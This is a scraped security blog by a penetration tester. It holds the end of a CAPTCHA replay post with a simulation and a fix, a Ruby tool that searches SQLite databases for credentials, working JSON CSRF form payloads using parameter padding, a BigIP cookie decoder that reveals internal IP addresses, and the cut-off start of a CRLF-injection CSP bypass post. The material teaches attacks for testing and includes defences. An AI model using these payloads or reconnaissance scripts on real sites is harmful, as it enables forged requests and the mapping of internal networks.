<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
</div>
<div class="WhitePaperBodycopy">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;">Using one-time tokens along with CAPTCHAs on the register pages may still be exploitable with a few additional lines of attack code. The best defense is to reset the CAPTCHA solution inside the HTTP session during the CAPTCHA verification stage. It is also important to note that when a website relies on a third party CAPTCHA provider, it does not maintain any session information at its end; CAPTCHA verification is performed by the CAPTCHA provider, and these websites are not vulnerable to the CAPTCHA Re-Riding Attack.</span></div>
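<div class="MsoNormal">
The two ingredients and the three post-success scenarios above, modelled in one place, as an added example that is not code from the original post or from any real captcha.php: an in-memory session store standing in for the server's HTTP session container, a verification routine that compares but never clears (the behavior the post describes), the recommended fix that removes the solution from the session on the first verification attempt, and a loop that counts how many registrations one solved CAPTCHA buys under scenarios 4.a (new SESSIONID, same session data), 4.b (same SESSIONID) and 4.c (new session). The store, the mode names and the random token sizes are constructed for the example.</div>
<br />
```python
import secrets


class SessionStore:
    """In-memory stand-in for a server's HTTP session container (constructed for
    this example). Keys are SESSIONID values, values are per-session attribute maps."""

    def __init__(self):
        self._sessions = {}

    def create(self):
        sid = secrets.token_hex(16)
        self._sessions[sid] = {}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

    def regenerate_id(self, sid):
        """Scenario 4.a: a fresh SESSIONID, but the same session data travels with it."""
        data = self._sessions.pop(sid)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid

    def replace(self, sid):
        """Scenario 4.c: a brand-new session; whatever the old one held is gone."""
        self._sessions.pop(sid, None)
        return self.create()


def generate_captcha(store, sid):
    """What /captcha.php does: mint random text and park the solution in the session.
    The image is irrelevant here, so the solution is returned directly."""
    solution = secrets.token_hex(3)
    store.get(sid)["captcha"] = solution
    return solution


def verify_vulnerable(store, sid, answer):
    """Verification as the post describes it: compares, but never clears."""
    session = store.get(sid)
    if session is None:
        return False
    expected = session.get("captcha")
    return expected is not None and secrets.compare_digest(expected, answer)


def verify_fixed(store, sid, answer):
    """The recommended fix: the solution leaves the session on the first verification
    attempt, right or wrong, so it can be consumed at most once."""
    session = store.get(sid)
    if session is None:
        return False
    expected = session.pop("captcha", None)
    return expected is not None and secrets.compare_digest(expected, answer)


def register(store, sid, answer, verify, on_success):
    """Form handler. Returns (accepted, SESSIONID the client holds afterwards)."""
    if not verify(store, sid, answer):
        return False, sid
    if on_success == "regenerate":    # 4.a
        return True, store.regenerate_id(sid)
    if on_success == "same":          # 4.b
        return True, sid
    return True, store.replace(sid)   # 4.c


def replay_count(verify, on_success, attempts=5):
    """How many registrations one solved CAPTCHA buys when the recorded request is
    replayed `attempts` times, each replay carrying whatever SESSIONID the previous
    response handed back (step 7 of the 4.a walkthrough)."""
    store = SessionStore()
    sid = store.create()
    answer = generate_captcha(store, sid)  # solved once, by a human
    accepted = 0
    for _ in range(attempts):
        ok, sid = register(store, sid, answer, verify, on_success)
        accepted += int(ok)
    return accepted


if __name__ == "__main__":
    for verify in (verify_vulnerable, verify_fixed):
        for mode in ("same", "regenerate", "replace"):
            print(verify.__name__, mode, replay_count(verify, mode))
```
<br />
<div class="MsoNormal">
With the vulnerable verifier, scenarios 4.a and 4.b accept all five replays and only 4.c stops at one, which is exactly the split in the analysis above; with the fixed verifier every scenario stops at one, because the fix works on the session attribute itself and does not depend on what the application does with the SESSIONID afterwards.</div>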
</div>
Gursev Singh Kalra (http://www.blogger.com/profile/11125392470187170013)

Sqlitespy for Sqlite Database analysis (posted 2012-02-25)<div dir="ltr" style="text-align: left;" trbidi="on"><span style="font-family: 'Trebuchet MS', sans-serif;">Sqlite is the ubiquitous database for mobile applications on iPad, iPhone and Android. It is also used by certain internet browsers, web application frameworks and software products for their local storage needs. While doing penetration tests, we often see sensitive information like usernames, passwords, account numbers, SSN etc… insecurely stored in these databases. Thus, every penetration test requires comprehensive analysis of the local databases being used.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<div><span style="font-family: 'Trebuchet MS', sans-serif;">While analyzing databases, a penetration tester repeatedly does the following:</span></div><ol style="text-align: left;"><li><span style="font-family: 'Trebuchet MS', sans-serif;">Opens the database in sqlite reader (sqlite3 or other readers)</span></li>
<li><span style="font-family: 'Trebuchet MS', sans-serif;">Views various tables and columns to understand database layout and schema.</span></li>
<li><span style="font-family: 'Trebuchet MS', sans-serif;">Analyzes the storage for sensitive information.</span></li>
</ol><span style="font-family: 'Trebuchet MS', sans-serif;">As the number and size of databases increase, the analysis time increases exponentially. To escape the recurring pain, I wrote a Ruby script to automate this process. The script achieves the following:</span><br />
<ol style="text-align: left;"><li><span style="text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Analyzes multiple databases in a single run.</span></span></li>
<li><span style="text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Queries and displays database schema.</span></span></li>
<li><span style="font-family: 'Trebuchet MS', sans-serif;"><span style="text-indent: -0.25in;">Provides an option to run search on Table and Column Names for quick analysis.</span></span></li>
<li><span style="line-height: 17px; text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Performs case-insensitive regular expression search (default). This can be controlled with command line options to one’s requirements.</span></span></li>
<li><span style="line-height: 17px; text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Displays Database, Tables and Row Number reference for every successful match.</span></span></li>
<li><span style="line-height: 17px; text-indent: -0.25in;"><span style="font-family: 'Trebuchet MS', sans-serif;">Dumps database rows on a successful match.</span></span></li>
<li><span style="text-indent: -0.25in;"><span style="line-height: 115%;"><span style="font-family: 'Trebuchet MS', sans-serif;">Looks for search strings in the following:</span></span></span></li>
<ul><li><span style="text-indent: -0.25in;"><span style="line-height: 115%;"><span style="font-family: 'Trebuchet MS', sans-serif;">Table Name</span></span></span></li>
<li><span style="text-indent: -0.25in;"><span style="line-height: 115%;"><span style="font-family: 'Trebuchet MS', sans-serif;">Column Names</span></span></span></li>
<li><span style="text-indent: -0.25in;"><span style="line-height: 115%;"><span style="font-family: 'Trebuchet MS', sans-serif;">Actual Data</span></span></span></li>
</ul></ol><div class="MsoNormal"><span style="font-family: 'Trebuchet MS', sans-serif;">Sqlitespy dependencies are listed below:</span></div><div class="MsoNormal"></div><ol style="text-align: left;"><li><a href="http://www.ruby-lang.org/en/"><span style="font-family: 'Trebuchet MS', sans-serif;">Ruby</span></a></li>
<li><span style="font-family: 'Trebuchet MS', sans-serif;"><a href="http://rubygems.org/gems/sequel">Sequel </a>Gem</span></li>
<li><a href="http://sqlite.org/download.html"><span style="font-family: 'Trebuchet MS', sans-serif;">Sqlite3</span></a></li>
</ol><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<div class="MsoNormal"><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span></div><div class="MsoNormal"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEYujccaKf7j-KHH3oznIsHRsQPfB8wsfZNBe_qyFpz611rDrTUJL26vbNwut3W0vviY4naOk83Tp8ybmGCBGfO_V5UKPQ26T5Bta_uQq8Bd8tx4aIJln08TgkVweTThKZZFiu1lVS1G__/s1600/spy--help.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEYujccaKf7j-KHH3oznIsHRsQPfB8wsfZNBe_qyFpz611rDrTUJL26vbNwut3W0vviY4naOk83Tp8ybmGCBGfO_V5UKPQ26T5Bta_uQq8Bd8tx4aIJln08TgkVweTThKZZFiu1lVS1G__/s400/spy--help.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption"><span style="font-family: 'Trebuchet MS', sans-serif; font-size: small;">Figure 1: Image shows sqlitespy help</span></div></td></tr>
</tbody></table><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGxJ2jPYncp9oBNWYiQhlDxv-6oU_uziQInR67x2MyIwYw9m75682GwzqMKsCdDBXSOTVaygsZXwneoBNq-FYcXZJuQdFQ5WB0qkgeR4epmNXHgbJ4WlaBjJrEsk86L5_MzEeyrUXOHPD-/s1600/spy--sample--run-row--dump.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGxJ2jPYncp9oBNWYiQhlDxv-6oU_uziQInR67x2MyIwYw9m75682GwzqMKsCdDBXSOTVaygsZXwneoBNq-FYcXZJuQdFQ5WB0qkgeR4epmNXHgbJ4WlaBjJrEsk86L5_MzEeyrUXOHPD-/s400/spy--sample--run-row--dump.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption"><span style="font-family: 'Trebuchet MS', sans-serif; font-size: small;">Figure 2: Image shows a sqlitespy sample run with multiple search strings and a row information dump for a successful match</span></div></td></tr>
</tbody></table><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSqOliCk5y0dO88y9GbCh6Ck0qC4IIy5Y-_XzJ0gU-b4foOVGq0YQPGZ1w2y9RkBqV0LVTCC1XYuUPBRkaxnIzsBlpyyog0No_bXcrbfRhgb-sNqbIpORIxzgrhemUp10ejSYeh8VFlfS0/s1600/spy--sample--run.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSqOliCk5y0dO88y9GbCh6Ck0qC4IIy5Y-_XzJ0gU-b4foOVGq0YQPGZ1w2y9RkBqV0LVTCC1XYuUPBRkaxnIzsBlpyyog0No_bXcrbfRhgb-sNqbIpORIxzgrhemUp10ejSYeh8VFlfS0/s400/spy--sample--run.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption"><span style="font-family: 'Trebuchet MS', sans-serif; font-size: small;">Figure 3: Image shows sqlitespy sample run with minimal information</span></div></td></tr>
</tbody></table><span style="font-family: 'Trebuchet MS', sans-serif;"><br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaa1oXLc9h8R3gDwSe1ZFjOkFIOrVVBPhlioDRSA8TNa-19yBcZcUQebsBJv0o6Yf6q4FXOAKoGV1HT3b4UfEvIim1M-KlzV_MYg06BUqPZZvZLHheox5Ck0Ni0ROMuQmP5UJ4p55TLSA-/s1600/spy--schema--dump.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaa1oXLc9h8R3gDwSe1ZFjOkFIOrVVBPhlioDRSA8TNa-19yBcZcUQebsBJv0o6Yf6q4FXOAKoGV1HT3b4UfEvIim1M-KlzV_MYg06BUqPZZvZLHheox5Ck0Ni0ROMuQmP5UJ4p55TLSA-/s400/spy--schema--dump.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption"><span style="font-family: 'Trebuchet MS', sans-serif; font-size: small;">Figure 4: Image shows sqlite database schema dump</span></div></td></tr>
</tbody></table><br />
<b><span style="font-family: 'Trebuchet MS', sans-serif;">Sqlitespy Code Follows:</span></b><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style><br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">#Author: Gursev Singh Kalra
require 'rubygems'
require 'optparse'
require 'ostruct'
require 'sequel'

# Parses the command line into an OpenStruct of options.
class CmdLineOptions
  def self.parse(args)
    options = OpenStruct.new
    options.dbs = []
    options.sstrings = []
    options.show_schema = false
    options.case_sensitive = false
    options.exact = false
    options.verbose = false
    options.rowdump = false
    options.metadata = false

    parser = OptionParser.new do |opts|
      opts.banner = "Usage: sqlitespy.rb [options]\n\nSpecific Options:"
      opts.on("-d", "--database DATABASE_PATH",
              "Sqlite database to analyze. Repeat the option to analyze several databases.") do |db|
        options.dbs << db
      end
      opts.on("-s", "--show-schema", "Show database schema") do |show|
        options.show_schema = show
      end
      opts.on("--find x,y,z", Array, "Strings (regular expressions) to search") do |list|
        options.sstrings = list
      end
      opts.on("-c", "--case-sensitive", "Perform case sensitive search. Default is case insensitive.") do |case_sensitive|
        options.case_sensitive = case_sensitive
      end
      opts.on("-e", "--exact-match", "Perform exact match for the search strings") do |v|
        options.exact = v
      end
      opts.on("-r", "--row-dump", "Dump Database Row when a match is found") do |v|
        options.rowdump = v
      end
      opts.on("-m", "--metadata", "Look for search strings only in DB metadata (table and column names)") do |v|
        options.metadata = v
      end
      opts.on("-v", "--verbose", "Verbose output") do |v|
        options.verbose = v
      end
      opts.on_tail("-h", "--help", "Show this message") do
        puts opts
        exit
      end
    end
    parser.parse!(args)
    options
  end # parse()
end # class CmdLineOptions

options = nil
begin
  options = CmdLineOptions.parse(ARGV)
rescue OptionParser::ParseError
  $stderr.puts "[-] Invalid option "
  options = CmdLineOptions.parse(ARGV + ["-h"])
end

if options.dbs.empty?
  $stderr.puts "[-] No Database available. Exiting !!"
  exit
end

# Keep only the paths that exist and can be opened as a sqlite database.
options.dbs.uniq!
dbs = options.dbs.collect do |db|
  begin
    raise Errno::ENOENT, db unless File.file?(db)
    Sequel.sqlite(db) { |handle| handle.tables } # open, list tables, close
    db
  rescue StandardError
    $stderr.puts "[-] \"#{db}\" is not a sqlite database"
    nil
  end
end
options.dbs = dbs.compact
if options.dbs.empty?
  $stderr.puts "[-] No Database available. Exiting."
  exit
end
options.sstrings.uniq!

# Schema dump: every table with its column names.
if options.show_schema
  puts
  puts "+" * 80
  puts "Database Schemas"
  puts "+" * 80
  options.dbs.each do |db|
    puts
    puts "[DATABASE] #{db}"
    Sequel.sqlite(db) do |dbhandle|
      dbhandle.tables.each do |table|
        puts "\t[TABLE] #{table}"
        puts "\t\t[COLUMNS] #{dbhandle[table.to_sym].columns.join(', ')}"
      end
    end
  end
  puts "-" * 80
end

# Compile each search string into a Regexp honouring --exact-match and --case-sensitive.
regex_strings = options.sstrings.collect do |search|
  regexstr = options.exact ? "^#{search}$" : search
  if options.case_sensitive
    Regexp.new(regexstr)
  else
    Regexp.new(regexstr, Regexp::IGNORECASE)
  end
end
options.sstrings = regex_strings

options.dbs.each do |database|
  if options.verbose
    puts
    puts "+" * 80
    puts "Analyzing Database '#{database}'"
    puts "+" * 80
  end
  Sequel.sqlite(database) do |databasehandle|
    databasehandle.tables.each do |table|
      if options.verbose
        puts
        puts "-" * 80
        puts "Analyzing Table '#{table}'"
        puts "-" * 80
      end
      # Table Name Search
      options.sstrings.each do |regex|
        if regex.match(table.to_s)
          puts "[+] Table Name Match Found -> Database '#{database}' -> TABLE '#{table}'"
        end
      end
      # Column Name Search
      databasehandle[table.to_sym].columns.each do |column_name|
        options.sstrings.each do |regex|
          if regex.match(column_name.to_s)
            puts "[+] Column Name Match Found -> Database '#{database}' -> TABLE '#{table}' -> COLUMN '#{column_name}'"
          end
        end
      end
      # Data Search (skipped when --metadata is given)
      if options.sstrings.length > 0 && !options.metadata
        row = 0
        databasehandle[table].each do |rowHash|
          row += 1
          rowHash.each do |key, value|
            options.sstrings.each do |regex|
              if regex.match(value.to_s)
                puts "[+] Data Match Found -> Database '#{database}' -> TABLE '#{table}', COLUMN '#{key}' -> ROW '#{row}'"
                puts "\t[*] Row Dump\t=>\t#{rowHash.values.join('|')}" if options.rowdump
              end
            end
          end
        end
      end
    end
  end
end
</code></pre></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-863406868250387152011-12-22T21:49:00.000-08:002012-02-01T08:31:48.161-08:00JSON CSRF with Parameter Padding<div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div class="MsoNormal">JavaScript Object Notation (JSON) is one of the prominent data exchange formats of contemporary web applications. When a web application accepts JSON, Cross Site Request Forgery (CSRF) payload delivery gets a bit tricky because of the mismatch between the query string and JSON formats. With a couple of tricks, however, we can successfully execute CSRF attacks with JSON payloads.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal">Let’s assume that the browser sends the following JSON to the web server.</div><div class="MsoNormal"><span style="color: red; font-family: 'Courier New';">{"a":1,"b":{"c":3}}</span></div><div class="MsoNormal"><b><br />
</b></div><div class="MsoNormal"><b>Scenario 1:</b> One of the mechanisms to execute JSON CSRF is to use the entire JSON payload as the parameter name in a self-submitting form. For example, loading the HTML code below and clicking the submit button sends the malicious JSON to the web server:</div><div class="MsoNormal"></div><div class="MsoNormal"></div><ol style="text-align: left;"><li><span style="font-family: 'Courier New', Courier, monospace;">&lt;html&gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;form action=http://192.168.1.41:3000 method=post <span style="color: red;">enctype="text/plain"</span> &gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;input name='<span style="color: red;">{"a":1,"b":{"c":3}}</span>' type='hidden'&gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;input type=submit&gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;/form&gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;/html&gt;</span></li>
</ol><br />
<br />
<div class="MsoNormal">At line# 2, the <span style="font-family: "Courier New";">enctype</span> form attribute is set to <span style="font-family: "Courier New";">text/plain</span> so that the JSON gets delivered as is. The <span style="font-family: "Courier New";">enctype</span> attribute may not be required, but is good to have. At line# 3, entire JSON payload is provided as a parameter name. When the form gets posted, the payload is delivered and CSRF executes.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: left;">Image below shows JSON payload delivery with the technique described above. </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwttXaVJspw-_Q39xTsBTm6n8VchALTkINFyxGC01lyzfaZaJKWollG-r3hlvu4s-7jkGEwcx-DJBspnETV0a8o2iYzrSeiu3IPd1sySiLmpxGVkL8S_07kPXYatC2YdXWlxh2y0WbyBxx/s1600/extra--equal--sign.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwttXaVJspw-_Q39xTsBTm6n8VchALTkINFyxGC01lyzfaZaJKWollG-r3hlvu4s-7jkGEwcx-DJBspnETV0a8o2iYzrSeiu3IPd1sySiLmpxGVkL8S_07kPXYatC2YdXWlxh2y0WbyBxx/s400/extra--equal--sign.png" width="400" /></a></div><div class="MsoNormal"><br />
</div><div class="MsoNormal">This technique may fail in some cases, namely when the server-side JSON parser enforces strict parsing and rejects the incoming JSON because of the trailing ‘=’ character.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><b>Scenario 2: JSON Parameter Padding to the rescue</b></div><div class="MsoNormal">In scenario 1, the trailing ‘=’ character may ruin the party when server-side JSON parsers enforce strict parsing rules. To overcome this, an additional parameter can be padded onto the end of the JSON payload so that a well-formed JSON document is sent. Just as with GET and POST parameter processing, the JSON parser will successfully parse the document, pick the parameters it requires and ignore the extraneous one. This allows a successful CSRF attack against vulnerable web applications.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal">Below, the HTML code in scenario 1 is modified to add an extraneous parameter to the JSON payload:</div><div class="MsoNormal"></div><div class="MsoNormal"></div><ol style="text-align: left;"><li><span style="font-family: 'Courier New', Courier, monospace;">&lt;html&gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;form action=http://192.168.1.41:3000 method=post enctype="text/plain" &gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;input name='<span style="color: red;">{"a":1,"b":{"c":3}</span><span style="color: blue;">, "ignore_me":"</span>' value='<span style="color: blue;">test"</span><span style="color: red;">}</span>' type='hidden'&gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;input type=submit&gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;/form&gt;</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">&lt;/html&gt;</span></li>
</ol><br />
<br />
<div class="MsoNormal">At line# 3, the component in red is the original JSON and the blue component adds the extraneous parameter to the JSON payload. The screenshot below shows the JSON payload delivered when the above HTML is executed. The <span style="font-family: 'Courier New';">ignore_me</span> parameter absorbs the trailing '<span style="font-family: 'Courier New';">=</span>' character and receives the value "<span style="font-family: 'Courier New';">=test</span>".</div><div class="MsoNormal"><br />
</div><div class="MsoNormal">The end result: successful server-side JSON parsing and CSRF goodness :)</div><div class="MsoNormal"><br />
</div><div class="MsoNormal">Image shows a well formed JSON sent using parameter padding</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoQUt2QwYCsTkl_WLRwX_Pxr0Rf8FWjvAf9Xlsgf3nCn0FFrmk5fQzRrFb6jW6f5mkYtfBqo9xiG483sQlWLoNb8A6Sm1BA7UicbzQqLOptluudS540AayTpWaP_V1l50R1klN5ttjKJ-r/s1600/parameter--padding--successful.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoQUt2QwYCsTkl_WLRwX_Pxr0Rf8FWjvAf9Xlsgf3nCn0FFrmk5fQzRrFb6jW6f5mkYtfBqo9xiG483sQlWLoNb8A6Sm1BA7UicbzQqLOptluudS540AayTpWaP_V1l50R1klN5ttjKJ-r/s400/parameter--padding--successful.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="MsoNormal"></div><div class="MsoNormal">It is important to note that the discussed attack vectors may not work if the server validates the “Content-Type” request header to represent a JSON payload: an HTML form can only submit with a Content-Type of text/plain, application/x-www-form-urlencoded or multipart/form-data, never application/json.</div><br />
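As an added example (not code from the original post), the Ruby below reproduces the two form bodies described above as a browser would send them, parses them with Ruby's stdlib JSON parser, and shows the Content-Type check from the previous paragraph as a hypothetical server-side handler; `handle_json_request` and `strict_json` are constructed names for this illustration.

```ruby
require 'json'

# Constructed request bodies, as a browser sends them for an HTML form with
# enctype="text/plain": "name=value" followed by CRLF. In scenario 1 the
# value is empty, so the body ends in a bare "=" right after the JSON.
SCENARIO1_BODY = %q({"a":1,"b":{"c":3}}=) + "\r\n"
SCENARIO2_BODY = %q({"a":1,"b":{"c":3}, "ignore_me":"=test"}) + "\r\n"

# Strict parse: the whole body must be exactly one JSON document (trailing
# whitespace is fine, a trailing "=" is not). Returns nil on any parse error.
def strict_json(body)
  JSON.parse(body)
rescue JSON::ParserError
  nil
end

# Hypothetical server-side handler (constructed for this example).
# An HTML form can only produce text/plain, application/x-www-form-urlencoded
# or multipart/form-data, so requiring application/json rejects a form-based
# CSRF request before the padded payload is ever parsed. Returns [status, body].
def handle_json_request(headers, body)
  media_type = headers.fetch('Content-Type', '').split(';').first.to_s.strip.downcase
  return [415, 'Unsupported Media Type'] unless media_type == 'application/json'
  data = strict_json(body)
  return [400, 'Malformed JSON'] if data.nil?
  [200, data]
end

if __FILE__ == $PROGRAM_NAME
  p strict_json(SCENARIO1_BODY) # nil: the trailing "=" breaks strict parsing
  p strict_json(SCENARIO2_BODY) # the padded payload parses, ignore_me => "=test"
  p handle_json_request({ 'Content-Type' => 'text/plain' }, SCENARIO2_BODY)       # [415, ...]
  p handle_json_request({ 'Content-Type' => 'application/json' }, SCENARIO2_BODY) # [200, {...}]
end
```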
</div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-35932961931088492542011-12-18T10:48:00.000-08:002011-12-18T10:48:32.947-08:00Decoding BigIP Cookie<div dir="ltr" style="text-align: left;" trbidi="on">The BigIP cookie carries internal network IP and port information in an encoded form. When decoded, these cookies help build a map of the internal network with potential web server IPs and their ports. <br />
<br />
F5 has described the encoding algorithm <a href="http://support.f5.com/kb/en-us/products/big-ip_ltm/manuals/product/ltm_configuration_guide_10_0_0/ltm_persist_profiles.html">here</a>. It works like this:<br />
<ol style="text-align: left;"><li>If the IP address is a.b.c.d, it is encoded as d*256^3 + c*256^2 + b*256 + a</li>
<li>The port is encoded by taking the two bytes that store it and reversing them. Thus, port 80 becomes 80 * 256 + 0 = 20480, and port 1433 (instead of 5 * 256 + 153) becomes 153 * 256 + 5 = 39173.</li>
<li>These values are combined into the cookie as<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> &lt;Encoded IP Address&gt;.&lt;Encoded Port Address&gt;.&lt;Component we are not concerned about&gt;</span></li>
</ol><div>These decoding mechanisms are packed into the following ruby script:</div><div><div><div></div><pre style="background: #dddddd; border: 1px dashed #CCCCCC; color: black; font-family: 'Courier New', Courier, monospace; font-size: 12px; height: auto; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">#!/usr/bin/ruby
# Decodes a BigIP persistence cookie value into the internal IP address and port.
# Sample cookies:
#   Cookie: BIGipcookie => 404007104.20480.0000
#   Cookie: BIGipcookie => 404007104.39173.0000

if ARGV.length == 0
  $stderr.puts "No input provided. Run as \n\tbigip.rb BigIP Cookie Value"
  exit 1
end

# Cookie layout: encoded_ip.encoded_port.unused
ips = ARGV[0].split(".")
encoded_val = ips[0].to_i
port_val = ips[1].to_i
ip = []
port = []

# The IP is stored as d*256^3 + c*256^2 + b*256 + a, so peeling the low byte
# off four times yields a, b, c, d in the original order.
4.times do
  ip << encoded_val % 256
  encoded_val /= 256
end

# The port bytes are stored reversed (port 80 is stored as 80 * 256 + 0 = 20480),
# so the low byte comes out first and is the high byte of the real port.
2.times do
  port << port_val % 256
  port_val /= 256
end

puts "IP Address : #{ip.join(".")}"
puts "Port : #{port[0] * 256 + port[1]}"
</code></pre><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBK3MYmR4RQLOvuMUv251af2m3yeXbV84hSVZH65tNCnr7yra81ZsFpEsreYddBLxYX2yn-8S0SDgfcfq9Rf-WIgm8L1Tdtn0lmEwXLBc2fS_TWWfbPIAhZ778MMmm9v2vGdfTS0wzlvJ_/s1600/bigip.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBK3MYmR4RQLOvuMUv251af2m3yeXbV84hSVZH65tNCnr7yra81ZsFpEsreYddBLxYX2yn-8S0SDgfcfq9Rf-WIgm8L1Tdtn0lmEwXLBc2fS_TWWfbPIAhZ778MMmm9v2vGdfTS0wzlvJ_/s320/bigip.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">A Sample bigip.rb run</td></tr>
</tbody></table><br />
</div></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-3268639301345243752011-11-28T09:41:00.000-08:002011-12-06T09:07:09.545-08:00Evading Content Security Policy With CRLF Injection<div dir="ltr" style="text-align: left;" trbidi="on">Content Security Policy (<a href="https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html">CSP</a>) was developed with the aim of reducing content injection attacks like Cross Site Scripting. CSP allows the developers to specify the permitted content sources for their web applications and relies on HTTP response headers to enforce content restrictions.<br />
<br />
When CSP is implemented by the web application and supported by the web browser, content injection attacks can be performed by:<br />
<br />
<ol style="text-align: left;"><li>Exploiting flaws in browser CSP implementation</li>
<li>Manipulating HTTP response headers.</li>
</ol><br />
<a href="https://www.owasp.org/index.php/CRLF_Injection">CRLF</a> injection is one possible technique by which an attacker can control HTTP response headers. If client-provided parameters are returned in response headers without any validation, CRLF injection can be used to bypass CSP restrictions. <br />
<br />
For the demonstration, two web pages were set up at two different origins with the following content:<br />
<b>Webpage 1:</b> http://localhost:3000/csp<br />
<b>Content:</b><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">http://localhost:3333/xss.js</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&lt;script src="http://localhost:3333/xss.js"&gt;&lt;/script&gt;</span><br />
<b>Webpage 2:</b> http://localhost:3333/xss.js<br />
